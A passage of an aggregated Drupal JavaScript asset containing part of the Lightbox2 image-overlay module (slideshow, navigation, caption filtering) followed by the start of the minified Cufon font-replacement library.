      $('#outerImageContainer').animate(animate1, Lightbox.resizeSpeed).animate(animate2, Lightbox.resizeSpeed, 'linear', function() { Lightbox.showData(); });
    }
    // Simultaneous.
    else {
      $('#outerImageContainer').animate({'width': widthNew, 'height': heightNew}, Lightbox.resizeSpeed, 'linear', function() { Lightbox.showData(); });
    }

    // If new and old image are same size and no scaling transition is necessary
    // do a quick pause to prevent image flicker.
    if ((hDiff === 0) && (wDiff === 0)) {
      if ($.browser.msie) {
        Lightbox.pause(250);
      }
      else {
        Lightbox.pause(100);
      }
    }

    var s = Drupal.settings.lightbox2;
    if (!s.use_alt_layout) {
      $('#prevLink, #nextLink').css({'height': imgHeight + 'px'});
    }
    $('#imageDataContainer').css({'width': widthNew + 'px'});
  },

  // showData()
  // Display image and begin preloading neighbors.
  showData: function() {
    $('#loading').hide();

    if (Lightbox.isLightframe || Lightbox.isVideo || Lightbox.isModal) {
      Lightbox.updateDetails();
      if (Lightbox.isLightframe) {
        $('#frameContainer').show();
        if ($.browser.safari || Lightbox.fadeInSpeed === 0) {
          $('#lightboxFrame').css({'zIndex': '10500'}).show();
        }
        else {
          $('#lightboxFrame').css({'zIndex': '10500'}).fadeIn(Lightbox.fadeInSpeed);
        }
      }
      else {
        if (Lightbox.isVideo) {
          $("#modalContainer").html(Lightbox.modalHTML).click(function(){return false;}).css('zIndex', '10500').show();
        }
        else {
          var src = unescape(Lightbox.imageArray[Lightbox.activeImage][0]);
          if (Lightbox.imageArray[Lightbox.activeImage][4]) {
            $(src).appendTo("#modalContainer");
            $('#modalContainer').css({'zIndex': '10500'}).show();
          }
          else {
            // Use a callback to show the new image, otherwise you get flicker.
            $("#modalContainer").hide().load(src, function () {$('#modalContainer').css({'zIndex': '10500'}).show();});
          }
          $('#modalContainer').unbind('click');
        }
        // This might be needed in the Lightframe section above.
        //$('#modalContainer').css({'zIndex': '10500'}).show();
      }
    }

    // Handle display of image content.
    else {
      $('#imageContainer').show();
      if ($.browser.safari || Lightbox.fadeInSpeed === 0) {
        $('#lightboxImage').css({'zIndex': '10500'}).show();
      }
      else {
        $('#lightboxImage').css({'zIndex': '10500'}).fadeIn(Lightbox.fadeInSpeed);
      }
      Lightbox.updateDetails();
      this.preloadNeighborImages();
    }
    Lightbox.inprogress = false;

    // Slideshow specific stuff.
    if (Lightbox.isSlideshow) {
      if (!Lightbox.loopSlides && Lightbox.activeImage == (Lightbox.total - 1)) {
        if (Lightbox.autoExit) {
          Lightbox.slideIdArray[Lightbox.slideIdCount++] = setTimeout(function () {Lightbox.end('slideshow');}, Lightbox.slideInterval);
        }
      }
      else {
        if (!Lightbox.isPaused && Lightbox.total > 1) {
          Lightbox.slideIdArray[Lightbox.slideIdCount++] = setTimeout(function () {Lightbox.changeData(Lightbox.activeImage + 1);}, Lightbox.slideInterval);
        }
      }
      if (Lightbox.showPlayPause && Lightbox.total > 1 && !Lightbox.isPaused) {
        $('#lightshowPause').show();
        $('#lightshowPlay').hide();
      }
      else if (Lightbox.showPlayPause && Lightbox.total > 1) {
        $('#lightshowPause').hide();
        $('#lightshowPlay').show();
      }
    }

    // Adjust the page overlay size.
    var arrayPageSize = Lightbox.getPageSize();
    var arrayPageScroll = Lightbox.getPageScroll();
    var pageHeight = arrayPageSize[1];
    if (Lightbox.isZoomedIn && arrayPageSize[1] > arrayPageSize[3]) {
      var lightboxTop = (Lightbox.topPosition == '' ? (arrayPageSize[3] / 10) : Lightbox.topPosition) * 1;
      pageHeight = pageHeight + arrayPageScroll[1] + lightboxTop;
    }
    $('#lightbox2-overlay').css({'height': pageHeight + 'px', 'width': arrayPageSize[0] + 'px'});

    // Gecko browsers (e.g. Firefox, SeaMonkey, etc) don't handle pdfs as
    // expected.
    if ($.browser.mozilla) {
      if (Lightbox.imageArray[Lightbox.activeImage][0].indexOf(".pdf") != -1) {
        setTimeout(function () {
          document.getElementById("lightboxFrame").src = Lightbox.imageArray[Lightbox.activeImage][0];
        }, 1000);
      }
    }
  },

  // updateDetails()
  // Display caption, image number, and bottom nav.
  updateDetails: function() {

    $("#imageDataContainer").hide();

    var s = Drupal.settings.lightbox2;

    if (s.show_caption) {
      var caption = Lightbox.filterXSS(Lightbox.imageArray[Lightbox.activeImage][1]);
      if (!caption) caption = '';
      $('#caption').html(caption).css({'zIndex': '10500'}).show();
    }

    // If image is part of set display 'Image x of x'.
    var numberDisplay = null;
    if (s.image_count && Lightbox.total > 1) {
      var currentImage = Lightbox.activeImage + 1;
      if (!Lightbox.isLightframe && !Lightbox.isModal && !Lightbox.isVideo) {
        numberDisplay = s.image_count.replace(/\!current/, currentImage).replace(/\!total/, Lightbox.total);
      }
      else if (Lightbox.isVideo) {
        numberDisplay = s.video_count.replace(/\!current/, currentImage).replace(/\!total/, Lightbox.total);
      }
      else {
        numberDisplay = s.page_count.replace(/\!current/, currentImage).replace(/\!total/, Lightbox.total);
      }
      $('#numberDisplay').html(numberDisplay).css({'zIndex': '10500'}).show();
    }
    else {
      $('#numberDisplay').hide();
    }

    $("#imageDataContainer").hide().slideDown(Lightbox.slideDownSpeed, function() {
      $("#bottomNav").show();
    });
    if (Lightbox.rtl == 1) {
      $("#bottomNav").css({'float': 'left'});
    }
    Lightbox.updateNav();
  },

  // updateNav()
  // Display appropriate previous and next hover navigation.
  updateNav: function() {

    $('#hoverNav').css({'zIndex': '10500'}).show();
    var prevLink = '#prevLink';
    var nextLink = '#nextLink';

    // Slideshow is separated as we need to show play / pause button.
    if (Lightbox.isSlideshow) {
      if ((Lightbox.total > 1 && Lightbox.loopSlides) || Lightbox.activeImage !== 0) {
        $(prevLink).css({'zIndex': '10500'}).show().click(function() {
          if (Lightbox.pauseOnPrevClick) {
            Lightbox.togglePlayPause("lightshowPause", "lightshowPlay");
          }
          Lightbox.changeData(Lightbox.activeImage - 1); return false;
        });
      }
      else {
        $(prevLink).hide();
      }

      // If not last image in set, display next image button.
      if ((Lightbox.total > 1 && Lightbox.loopSlides) || Lightbox.activeImage != (Lightbox.total - 1)) {
        $(nextLink).css({'zIndex': '10500'}).show().click(function() {
          if (Lightbox.pauseOnNextClick) {
            Lightbox.togglePlayPause("lightshowPause", "lightshowPlay");
          }
          Lightbox.changeData(Lightbox.activeImage + 1); return false;
        });
      }
      // Safari browsers need to have hide() called again.
      else {
        $(nextLink).hide();
      }
    }

    // All other types of content.
    else {

      if ((Lightbox.isLightframe || Lightbox.isModal || Lightbox.isVideo) && !Lightbox.alternative_layout) {
        $('#frameHoverNav').css({'zIndex': '10500'}).show();
        $('#hoverNav').css({'zIndex': '10500'}).hide();
        prevLink = '#framePrevLink';
        nextLink = '#frameNextLink';
      }

      // If not first image in set, display prev image button.
      if ((Lightbox.total > 1 && Lightbox.loopItems) || Lightbox.activeImage !== 0) {
        // Unbind any other click handlers, otherwise this adds a new click handler
        // each time the arrow is clicked.
        $(prevLink).css({'zIndex': '10500'}).show().unbind().click(function() {
          Lightbox.changeData(Lightbox.activeImage - 1); return false;
        });
      }
      // Safari browsers need to have hide() called again.
      else {
        $(prevLink).hide();
      }

      // If not last image in set, display next image button.
      if ((Lightbox.total > 1 && Lightbox.loopItems) || Lightbox.activeImage != (Lightbox.total - 1)) {
        // Unbind any other click handlers, otherwise this adds a new click handler
        // each time the arrow is clicked.
        $(nextLink).css({'zIndex': '10500'}).show().unbind().click(function() {
          Lightbox.changeData(Lightbox.activeImage + 1); return false;
        });
      }
      // Safari browsers need to have hide() called again.
      else {
        $(nextLink).hide();
      }
    }

    // Don't enable keyboard shortcuts so forms will work.
    if (!Lightbox.isModal) {
      this.enableKeyboardNav();
    }
  },


  // enableKeyboardNav()
  enableKeyboardNav: function() {
    $(document).bind("keydown", this.keyboardAction);
  },

  // disableKeyboardNav()
  disableKeyboardNav: function() {
    $(document).unbind("keydown", this.keyboardAction);
  },

  // keyboardAction()
  keyboardAction: function(e) {
    if (e === null) { // IE.
      keycode = event.keyCode;
      escapeKey = 27;
    }
    else { // Mozilla.
      keycode = e.keyCode;
      escapeKey = e.DOM_VK_ESCAPE;
    }

    key = String.fromCharCode(keycode).toLowerCase();

    // Close lightbox.
    if (Lightbox.checkKey(Lightbox.keysClose, key, keycode)) {
      Lightbox.end('forceClose');
    }
    // Display previous image (p, <-).
    else if (Lightbox.checkKey(Lightbox.keysPrevious, key, keycode)) {
      if ((Lightbox.total > 1 && ((Lightbox.isSlideshow && Lightbox.loopSlides) || (!Lightbox.isSlideshow && Lightbox.loopItems))) || Lightbox.activeImage !== 0) {
        Lightbox.changeData(Lightbox.activeImage - 1);
      }

    }
    // Display next image (n, ->).
    else if (Lightbox.checkKey(Lightbox.keysNext, key, keycode)) {
      if ((Lightbox.total > 1 && ((Lightbox.isSlideshow && Lightbox.loopSlides) || (!Lightbox.isSlideshow && Lightbox.loopItems))) || Lightbox.activeImage != (Lightbox.total - 1)) {
        Lightbox.changeData(Lightbox.activeImage + 1);
      }
    }
    // Zoom in.
    else if (Lightbox.checkKey(Lightbox.keysZoom, key, keycode) && !Lightbox.disableResize && !Lightbox.disableZoom && !Lightbox.isSlideshow && !Lightbox.isLightframe) {
      if (Lightbox.isZoomedIn) {
        Lightbox.changeData(Lightbox.activeImage, false);
      }
      else if (!Lightbox.isZoomedIn) {
        Lightbox.changeData(Lightbox.activeImage, true);
      }
      return false;
    }
    // Toggle play / pause (space).
    else if (Lightbox.checkKey(Lightbox.keysPlayPause, key, keycode) && Lightbox.isSlideshow) {

      if (Lightbox.isPaused) {
        Lightbox.togglePlayPause("lightshowPlay", "lightshowPause");
      }
      else {
        Lightbox.togglePlayPause("lightshowPause", "lightshowPlay");
      }
      return false;
    }
  },

  preloadNeighborImages: function() {

    if ((Lightbox.total - 1) > Lightbox.activeImage) {
      preloadNextImage = new Image();
      preloadNextImage.src = Lightbox.imageArray[Lightbox.activeImage + 1][0];
    }
    if (Lightbox.activeImage > 0) {
      preloadPrevImage = new Image();
      preloadPrevImage.src = Lightbox.imageArray[Lightbox.activeImage - 1][0];
    }

  },

  end: function(caller) {
    var closeClick = (caller == 'slideshow' ? false : true);
    if (Lightbox.isSlideshow && Lightbox.isPaused && !closeClick) {
      return;
    }
    // To prevent double clicks on navigation links.
    if (Lightbox.inprogress === true && caller != 'forceClose') {
      return;
    }
    Lightbox.disableKeyboardNav();
    $('#lightbox').hide();
    $("#lightbox2-overlay").fadeOut();
    Lightbox.isPaused = true;
    Lightbox.inprogress = false;
    // Replaces calls to showSelectBoxes() and showFlash() in original
    // lightbox2.
    Lightbox.toggleSelectsFlash('visible');
    if (Lightbox.isSlideshow) {
      for (var i = 0; i < Lightbox.slideIdCount; i++) {
        window.clearTimeout(Lightbox.slideIdArray[i]);
      }
      $('#lightshowPause, #lightshowPlay').hide();
    }
    else if (Lightbox.isLightframe) {
      $('#frameContainer').empty().hide();
    }
    else if (Lightbox.isVideo || Lightbox.isModal) {
      if (!Lightbox.auto_modal) {
        $('#modalContainer').hide().html("");
      }
      Lightbox.auto_modal = false;
    }
  },


  // getPageScroll()
  // Returns array with x,y page scroll values.
  // Core code from - quirksmode.com.
  getPageScroll : function() {

    var xScroll, yScroll;

    if (self.pageYOffset || self.pageXOffset) {
      yScroll = self.pageYOffset;
      xScroll = self.pageXOffset;
    }
    else if (document.documentElement && (document.documentElement.scrollTop || document.documentElement.scrollLeft)) {  // Explorer 6 Strict.
      yScroll = document.documentElement.scrollTop;
      xScroll = document.documentElement.scrollLeft;
    }
    else if (document.body) {// All other Explorers.
      yScroll = document.body.scrollTop;
      xScroll = document.body.scrollLeft;
    }

    arrayPageScroll = [xScroll,yScroll];
    return arrayPageScroll;
  },

  // getPageSize()
  // Returns array with page width, height and window width, height.
  // Core code from - quirksmode.com.
  // Edit for Firefox by pHaez.

  getPageSize : function() {

    var xScroll, yScroll;

    if (window.innerHeight && window.scrollMaxY) {
      xScroll = window.innerWidth + window.scrollMaxX;
      yScroll = window.innerHeight + window.scrollMaxY;
    }
    else if (document.body.scrollHeight > document.body.offsetHeight) { // All but Explorer Mac.
      xScroll = document.body.scrollWidth;
      yScroll = document.body.scrollHeight;
    }
    else { // Explorer Mac...would also work in Explorer 6 Strict, Mozilla and Safari.
      xScroll = document.body.offsetWidth;
      yScroll = document.body.offsetHeight;
    }

    var windowWidth, windowHeight;

    if (self.innerHeight) { // All except Explorer.
      if (document.documentElement.clientWidth) {
        windowWidth = document.documentElement.clientWidth;
      }
      else {
        windowWidth = self.innerWidth;
      }
      windowHeight = self.innerHeight;
    }
    else if (document.documentElement && document.documentElement.clientHeight) { // Explorer 6 Strict Mode.
      windowWidth = document.documentElement.clientWidth;
      windowHeight = document.documentElement.clientHeight;
    }
    else if (document.body) { // Other Explorers.
      windowWidth = document.body.clientWidth;
      windowHeight = document.body.clientHeight;
    }
    // For small pages with total height less than height of the viewport.
    if (yScroll < windowHeight) {
      pageHeight = windowHeight;
    }
    else {
      pageHeight = yScroll;
    }
    // For small pages with total width less than width of the viewport.
    if (xScroll < windowWidth) {
      pageWidth = xScroll;
    }
    else {
      pageWidth = windowWidth;
    }
    arrayPageSize = new Array(pageWidth,pageHeight,windowWidth,windowHeight);
    return arrayPageSize;
  },


  // pause(numberMillis)
  pause : function(ms) {
    var date = new Date();
    var curDate = null;
    do { curDate = new Date(); }
    while (curDate - date < ms);
  },


  // toggleSelectsFlash()
  // Hide / unhide select lists and flash objects as they appear above the
  // lightbox in some browsers.
  toggleSelectsFlash: function (state) {
    if (state == 'visible') {
      $("select.lightbox_hidden, embed.lightbox_hidden, object.lightbox_hidden").show();
    }
    else if (state == 'hide') {
      $("select:visible, embed:visible, object:visible").not('#lightboxAutoModal select, #lightboxAutoModal embed, #lightboxAutoModal object').addClass("lightbox_hidden");
      $("select.lightbox_hidden, embed.lightbox_hidden, object.lightbox_hidden").hide();
    }
  },


  // parseRel()
  parseRel: function (link) {
    var parts = [];
    parts["rel"] = parts["title"] = parts["group"] = parts["style"] = parts["flashvars"] = null;
    if (!$(link).attr('rel')) return parts;
    parts["rel"] = $(link).attr('rel').match(/\w+/)[0];

    if ($(link).attr('rel').match(/\[(.*)\]/)) {
      var info = $(link).attr('rel').match(/\[(.*?)\]/)[1].split('|');
      parts["group"] = info[0];
      parts["style"] = info[1];
      if (parts["style"] != undefined && parts["style"].match(/flashvars:\s?(.*?);/)) {
        parts["flashvars"] = parts["style"].match(/flashvars:\s?(.*?);/)[1];
      }
    }
    if ($(link).attr('rel').match(/\[.*\]\[(.*)\]/)) {
      parts["title"] = $(link).attr('rel').match(/\[.*\]\[(.*)\]/)[1];
    }
    return parts;
  },

  // setStyles()
  setStyles: function(item, styles) {
    item.width = Lightbox.iframe_width;
    item.height = Lightbox.iframe_height;
    item.scrolling = "auto";

    if (!styles) return item;
    var stylesArray = styles.split(';');
    for (var i = 0; i< stylesArray.length; i++) {
      if (stylesArray[i].indexOf('width:') >= 0) {
        var w = stylesArray[i].replace('width:', '');
        item.width = jQuery.trim(w);
      }
      else if (stylesArray[i].indexOf('height:') >= 0) {
        var h = stylesArray[i].replace('height:', '');
        item.height = jQuery.trim(h);
      }
      else if (stylesArray[i].indexOf('scrolling:') >= 0) {
        var scrolling = stylesArray[i].replace('scrolling:', '');
        item.scrolling = jQuery.trim(scrolling);
      }
      else if (stylesArray[i].indexOf('overflow:') >= 0) {
        var overflow = stylesArray[i].replace('overflow:', '');
        item.overflow = jQuery.trim(overflow);
      }
    }
    return item;
  },


  // togglePlayPause()
  // Hide the pause / play button as appropriate.  If pausing the slideshow also
  // clear the timers, otherwise move onto the next image.
  togglePlayPause: function(hideId, showId) {
    if (Lightbox.isSlideshow && hideId == "lightshowPause") {
      for (var i = 0; i < Lightbox.slideIdCount; i++) {
        window.clearTimeout(Lightbox.slideIdArray[i]);
      }
    }
    $('#' + hideId).hide();
    $('#' + showId).show();

    if (hideId == "lightshowPlay") {
      Lightbox.isPaused = false;
      if (!Lightbox.loopSlides && Lightbox.activeImage == (Lightbox.total - 1)) {
        Lightbox.end();
      }
      else if (Lightbox.total > 1) {
        Lightbox.changeData(Lightbox.activeImage + 1);
      }
    }
    else {
      Lightbox.isPaused = true;
    }
  },

  triggerLightbox: function (rel_type, rel_group) {
    if (rel_type.length) {
      if (rel_group && rel_group.length) {
        $("a[rel^='" + rel_type +"\[" + rel_group + "\]'], area[rel^='" + rel_type +"\[" + rel_group + "\]']").eq(0).trigger("click");
      }
      else {
        $("a[rel^='" + rel_type +"'], area[rel^='" + rel_type +"']").eq(0).trigger("click");
      }
    }
  },

  detectMacFF2: function() {
    var ua = navigator.userAgent.toLowerCase();
    if (/firefox[\/\s](\d+\.\d+)/.test(ua)) {
      var ffversion = new Number(RegExp.$1);
      if (ffversion < 3 && ua.indexOf('mac') != -1) {
        return true;
      }
    }
    return false;
  },

  checkKey: function(keys, key, code) {
    return (jQuery.inArray(key, keys) != -1 || jQuery.inArray(String(code), keys) != -1);
  },

  filterXSS: function(str, allowed_tags) {
    var output = "";
    $.ajax({
      url: Drupal.settings.basePath + 'system/lightbox2/filter-xss',
      data: {
        'string' : str,
        'allowed_tags' : allowed_tags
      },
      type: "POST",
      async: false,
      dataType:  "json",
      success: function(data) {
        output = data;
      }
    });
    return output;
  }

};

// Initialize the lightbox.
Drupal.behaviors.initLightbox = function (context) {
  $('body:not(.lightbox-processed)', context).addClass('lightbox-processed').each(function() {
    Lightbox.initialize();
    return false; // Break the each loop.
  });

  // Attach lightbox to any links with lightbox rels.
  Lightbox.initList(context);
  $('#lightboxAutoModal', context).triggerHandler('click');
};

;
/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 *
 * @version 1.09i
 */
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("vml",(function(){var e=document.namespaces;if(!e){return}e.add("cvml","urn:schemas-microsoft-com:vml");e=null;var b=document.createElement("cvml:shape");b.style.behavior="url(#default#VML)";if(!b.coordsize){return}b=null;var h=(document.documentMode||0)<8;document.write(('<style type="text/css">cufoncanvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}cufoncanvas{position:absolute;text-align:left;}cufon{display:inline-block;position:relative;vertical-align:'+(h?"middle":"text-bottom")+";}cufon cufontext{position:absolute;left:-10000in;font-size:1px;}a cufon{cursor:pointer}}@media print{cufon cufoncanvas{display:none;}}</style>").replace(/;/g,"!important;"));function c(i,j){return 